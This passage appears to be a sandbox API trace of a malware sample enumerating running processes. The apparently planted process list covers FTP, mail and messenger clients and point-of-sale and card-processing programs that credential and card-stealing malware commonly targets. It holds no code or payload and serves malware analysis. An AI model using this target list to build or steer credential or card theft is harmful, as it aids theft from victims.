(in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.154] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.154] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.155] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0056.156] CloseHandle (hObject=0x130) returned 1 [0056.156] GetCurrentThread () returned 0xfffffffe [0056.156] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0056.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0056.268] Process32FirstW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.269] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.270] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.271] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.271] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.272] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.273] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.274] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.275] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.276] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0056.277] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.278] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.279] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.280] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.281] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.282] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.283] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.284] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.285] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.286] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.287] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.288] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.289] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.290] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0056.291] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0056.292] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0056.293] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0056.294] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0056.295] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0056.296] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0056.297] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0056.297] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0056.298] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0056.299] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0056.300] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0056.300] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0056.301] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0056.302] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0056.302] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0056.303] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0056.309] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0056.309] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0056.310] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0056.310] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0056.311] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0056.312] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0056.312] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0056.313] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0056.314] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0056.314] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0056.315] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0056.316] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0056.317] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0056.317] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0056.318] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0056.318] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0056.332] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0056.332] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0056.333] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0056.335] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0056.337] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0056.339] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0056.341] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0056.342] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0056.344] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0056.346] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0056.347] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0056.349] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0056.350] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0056.352] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0056.354] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0056.356] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0056.357] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0056.359] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0056.360] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0056.361] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0056.363] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0056.364] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0056.369] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0056.370] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, 